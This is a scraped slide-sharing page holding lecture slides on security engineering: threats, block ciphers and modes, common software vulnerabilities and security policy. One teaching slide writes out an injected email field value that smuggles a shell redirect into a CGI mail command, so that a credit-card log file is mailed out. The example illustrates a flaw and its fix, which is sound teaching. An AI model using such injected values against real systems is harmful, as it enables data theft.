GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
Guy Korland
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
Sri Ambati
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
Cheryl Hung
 
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Tobias Schneck
 
Generating a custom Ruby SDK for your web service or Rails API using Smithy
Generating a custom Ruby SDK for your web service or Rails API using SmithyGenerating a custom Ruby SDK for your web service or Rails API using Smithy
Generating a custom Ruby SDK for your web service or Rails API using Smithy
g2nightmarescribd
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
Dorra BARTAGUIZ
 
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Jeffrey Haguewood
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
Paul Groth
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
Product School
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
Thijs Feryn
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
Laura Byrne
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Inflectra
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3
DianaGray10
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
Ana-Maria Mihalceanu
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
Alan Dix
 
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
Product School
 

Recently uploaded (20)

JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
 
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
 
Generating a custom Ruby SDK for your web service or Rails API using Smithy
Generating a custom Ruby SDK for your web service or Rails API using SmithyGenerating a custom Ruby SDK for your web service or Rails API using Smithy
Generating a custom Ruby SDK for your web service or Rails API using Smithy
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
 
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
 
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
 

3 f6 security

  • 1. Security Engineering Steven J. Murdoch Computer Laboratory Based on Security I course by Markus Kuhn 1
  • 2. Computer Security / Information Security Definition Computer Security: the discipline of managing malicious intent and behaviour involving information and communication technology 2
  • 3. Computer Security / Information Security Definition Computer Security: the discipline of managing malicious intent and behaviour involving information and communication technology Malicious behaviour can include Fraud/theft – unauthorised access to money, goods or services Vandalism – causing damage for personal reasons (frustration, envy, revenge, curiosity, self esteem, peer recognition, . . . ) Terrorism – causing damage, disruption and fear to intimidate Warfare – damaging military assets to overthrow a government Espionage – stealing information to gain competitive advantage Sabotage – causing damage to gain competitive advantage “Spam” – unsolicited marketing wasting time/resources Illegal content – child sexual abuse images, Nazi materials, . . . 2
  • 4. Computer Security / Information Security Definition Computer Security: the discipline of managing malicious intent and behaviour involving information and communication technology Malicious behaviour can include Fraud/theft – unauthorised access to money, goods or services Vandalism – causing damage for personal reasons (frustration, envy, revenge, curiosity, self esteem, peer recognition, . . . ) Terrorism – causing damage, disruption and fear to intimidate Warfare – damaging military assets to overthrow a government Espionage – stealing information to gain competitive advantage Sabotage – causing damage to gain competitive advantage “Spam” – unsolicited marketing wasting time/resources Illegal content – child sexual abuse images, Nazi materials, . . . Security vs safety engineering: focus on intentional rather than accidental behaviour, presence of intelligent adversary. 2
  • 5. Where is information security a concern? Many organisations are today critically dependent on the flawless operation of computer systems. Without these, we might lose in a business environment: 3
  • 6. Where is information security a concern? Many organisations are today critically dependent on the flawless operation of computer systems. Without these, we might lose in a business environment: legal compliance, cash flow, business continuity, profitability, commercial image and shareholder confidence, product integrity, intellectual property and competitive advantage in a military environment: 3
  • 7. Where is information security a concern? Many organisations are today critically dependent on the flawless operation of computer systems. Without these, we might lose in a business environment: legal compliance, cash flow, business continuity, profitability, commercial image and shareholder confidence, product integrity, intellectual property and competitive advantage in a military environment: exclusive access to and effectiveness of weapons, electronic countermeasures, communications secrecy, identification and location information, automated defences in a medical environment: 3
  • 8. Where is information security a concern? Many organisations are today critically dependent on the flawless operation of computer systems. Without these, we might lose in a business environment: legal compliance, cash flow, business continuity, profitability, commercial image and shareholder confidence, product integrity, intellectual property and competitive advantage in a military environment: exclusive access to and effectiveness of weapons, electronic countermeasures, communications secrecy, identification and location information, automated defences in a medical environment: confidentiality and integrity of patient records, unhindered emergency access, equipment safety, correct diagnosis and treatment information in households: 3
  • 9. Where is information security a concern? Many organisations are today critically dependent on the flawless operation of computer systems. Without these, we might lose in a business environment: legal compliance, cash flow, business continuity, profitability, commercial image and shareholder confidence, product integrity, intellectual property and competitive advantage in a military environment: exclusive access to and effectiveness of weapons, electronic countermeasures, communications secrecy, identification and location information, automated defences in a medical environment: confidentiality and integrity of patient records, unhindered emergency access, equipment safety, correct diagnosis and treatment information in households: PC, privacy, correct billing, burglar alarms in society at large: 3
  • 10. Where is information security a concern? Many organisations are today critically dependent on the flawless operation of computer systems. Without these, we might lose in a business environment: legal compliance, cash flow, business continuity, profitability, commercial image and shareholder confidence, product integrity, intellectual property and competitive advantage in a military environment: exclusive access to and effectiveness of weapons, electronic countermeasures, communications secrecy, identification and location information, automated defences in a medical environment: confidentiality and integrity of patient records, unhindered emergency access, equipment safety, correct diagnosis and treatment information in households: PC, privacy, correct billing, burglar alarms in society at large: utility services, communications, transport, tax/benefits collection, goods supply, . . . 3
  • 11. Common information security targets Most information-security concerns fall into three broad categories: Confidentiality ensuring that information is accessible only to those authorised to have access Integrity safeguarding the accuracy and completeness of information and processing methods Availability ensuring that authorised users have access to information and associated assets when required 4
  • 12. Blockciphers Encryption is performed today typically with blockcipher algorithms, which are key-dependent permutations, operating on bit-block alphabets. Typical alphabet sizes: 264 or 2128 E : {0, 1}k × {0, 1}n → {0, 1}n Confusion – make relationship between key and ciphertext as complex as possible Diffusion – remove statistical links between plaintext and ciphertext Prevent adaptive chosen-plaintext attacks, including differential and linear cryptanalysis Product cipher: iterate many rounds of a weak pseudo-random permutation to get a strong one Feistel structure, substitution/permutation network, key-dependent s-boxes, mix incompatible groups, transpositions, linear transformations, arithmetic operations, substitutions, . . . 5
  • 13. Block cipher standards In 1977, the US government standardized a block cipher for unclassified data, based on a proposal by an IBM team led by Horst Feistel. DES has a block size of 64 bits and a key size of 56 bits. The relatively short key size and its limited protection against brute-force key searches immediately triggered criticism, but this did not prevent DES from becoming the most commonly used cipher for banking networks and numerous other applications for more than 25 years. 6
  • 14. Block cipher standards In 1977, the US government standardized a block cipher for unclassified data, based on a proposal by an IBM team led by Horst Feistel. DES has a block size of 64 bits and a key size of 56 bits. The relatively short key size and its limited protection against brute-force key searches immediately triggered criticism, but this did not prevent DES from becoming the most commonly used cipher for banking networks and numerous other applications for more than 25 years. In November 2001, the US government published the new Advanced Encryption Standard (AES), the official DES successor with 128-bit block size and either 128, 192 or 256 bit key length. It adopted the “Rijndael” cipher designed by Joan Daemen and Vincent Rijmen, which offers additional block/key size combinations. Recent CPUs with AES hardware support: Intel/AMD x86 AES-NI instructions, VIA PadLock. 6
  • 15. Electronic Code Book (ECB) P1 P2 Pn EK EK ··· EK C1 C2 Cn In the simplest mode of operation standardised for DES, AES, and other block ciphers, the message is cut into n m-bit blocks, where m is the block size of the cipher, and then the cipher function is applied to each block individually. http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf 7
  • 17. Cipher Block Chaining (CBC) P1 P2 Pn ⊕ ⊕ ⊕ RND EK EK ··· EK C0 C1 C2 Cn initial vector Pi ⊕ EK Ci Ci = EK (Pi ⊕ Ci−1 ) 9
  • 22. Common software vulnerabilities Missing checks for data size (→ stack buffer overflow) Missing checks for data content (e.g., shell meta characters) Missing checks for boundary conditions Missing checks for success/failure of operations Missing locks – insufficient serialisation Race conditions – time of check to time of use Incomplete checking of environment Unexpected side channels (timing, etc.) Lack of authentication The “curses of security” (Gollmann): change, complacency, convenience (software reuse for inappropriate purposes, too large TCB, etc.) C.E. Landwehr, et al.: A taxonomy of computer program security flaws, with examples. ACM Computing Surveys 26(3), September 1994. http://dx.doi.org/10.1145/185403.185412 14
  • 23. Example for a missing check of data size A C program declares a local short string variable char buffer[80]; and then uses the standard C library routine call gets(buffer); to read a single text line from standard input and save it into buffer. This works fine for normal-length lines but corrupts the stack if the input is longer than 79 characters. Attacker loads malicious code into buffer and redirects return address to its start: Memory: Program Data Heap free Stack Stack: . . . ? buffer[80] FP RET Parameters - ... 15
  • 24. Example for missing check of input data A web server allows users to provide an email address in a form field to receive a file. The address is received by a na¨ ıvely implemented Perl CGI script and stored in the variable $email. The CGI script then attempts to send out the email with the command system("mail $email <message"); This works fine as long as $email contains only a normal email address, free of shell meta-characters. An attacker provides a carefully selected pathological address such as trustno1@hotmail.com < /var/db/creditcards.log ; echo and executes arbitrary commands (here to receive confidential data via email). The solution requires that each character with special meaning handed over to another software is prefixed with a suitable escape symbol (e.g., or ’...’ in the case of the Unix shell). This requires a detailed understanding of the recipient’s complete syntax. Checks for meta characters are also frequently forgotten for text that is passed on to SQL engines, embedded into HTML pages, etc. 16
  • 25. Integer overflows Integer numbers in computers behave differently from integer numbers in mathematics. For an unsigned 8-bit integer value, we have 255 + 1 == 0 0 - 1 == 255 16 * 17 == 16 and likewise for a signed 8-bit value, we have 127 + 1 == -128 -128 / -1 == -128 And what looks like an obvious endless loop int i = 1; while (i > 0) i = i * 2; terminates after 15, 31, or 63 steps (depending on the register size). 17
  • 26. Security Management and Engineering I “Is this product/technique/service secure?” Simple Yes/No answers are often wanted, but typically inappropriate. Security of an item depends much on the context in which it is used. Complex systems can provide a very large number of elements and interactions that are open to abuse. An effective protection can therefore only be obtained as the result of a systematic planning approach. 18
  • 27. Security Management and Engineering II “No need to worry, our product is 100% secure. All data is encrypted with 128-bit keys. It takes billions of years to break these.” Such statements are abundant in marketing literature. A security manager should ask: What does the mechanism achieve? Do we need confidentiality, integrity or availability of exactly this data? Who will generate the keys and how? Who will store / have access to the keys? Can we lose keys and with them data? Will it interfere with other security measures (backup, auditing, scanning, . . . )? Will it introduce new vulnerabilities or can it somehow be used against us? What if it breaks or is broken? ... 19
  • 28. Security policy development Step 1: Security requirements analysis Identify assets and their value Identify vulnerabilities, threats and risk priorities Identify legal and contractual requirements Step 2: Work out a suitable security policy The security requirements identified can be complex and may have to be abstracted first into a high-level security policy, a set of rules that clarifies which are or are not authorised, required, and prohibited activities, states and information flows. Security policy models are techniques for the precise and even formal definition of such protection goals. They can describe both automatically enforced policies (e.g., a mandatory access control configuration in an operating system, a policy description language for a database management system, etc.) and procedures for employees (e.g., segregation of duties). 20
  • 29. Step 3: Security policy document Once a good understanding exists of what exactly security means for an organisation and what needs to be protected or enforced, the high-level security policy should be documented as a reference for anyone involved in implementing controls. It should clearly lay out the overall objectives, principles and the underlying threat model that are to guide the choice of mechanisms in the next step. Step 4: Selection and implementation of controls Issues addressed in a typical low-level organisational security policy: General (affecting everyone) and specific responsibilities for security Names manager who “owns” the overall policy and is in charge of its continued enforcement, maintenance, review, and evaluation of effectiveness Names individual managers who “own” individual information assets and are responsible for their day-to-day security Reporting responsibilities for security incidents, vulnerabilities, software malfunctions Mechanisms for learning from incidents 21
  • 30. Incentives, disciplinary process, consequences of policy violations User training, documentation and revision of procedures Personnel security (depending on sensitivity of job) Background checks, supervision, confidentiality agreement Regulation of third-party access Physical security Definition of security perimeters, locating facilities to minimise traffic across perimeters, alarmed fire doors, physical barriers that penetrate false floors/ceilings, entrance controls, handling of visitors and public access, visible identification, responsibility to challenge unescorted strangers, location of backup equipment at safe distance, prohibition of recording equipment, redundant power supplies, access to cabling, authorisation procedure for removal of property, clear desk/screen policy, etc. Segregation of duties Avoid that a single person can abuse authority without detection (e.g., different people must raise purchase order and confirm delivery of goods, croupier vs. cashier in casino) Audit trails What activities are logged, how are log files protected from manipulation Separation of development and operational facilities Protection against unauthorised and malicious software 22
  • 31. Organising backup and rehearsing restoration File/document access control, sensitivity labeling of documents and media Disposal of media Zeroise, degauss, reformat, or shred and destroy storage media, paper, carbon paper, printer ribbons, etc. before discarding it. Network and software configuration management Line and file encryption, authentication, key and password management Duress alarms, terminal timeouts, clock synchronisation, . . . For more detailed check lists and guidelines for writing informal security policy documents along these lines, see for example British Standard 7799 “Code of practice for information security management” German Information Security Agency’s “IT Baseline Protection Manual” http://www.bsi.bund.de/english/gshb/manual/ US DoD National Computer Security Center Rainbow Series, for military policy guidelines http://en.wikipedia.org/wiki/Rainbow_Series 23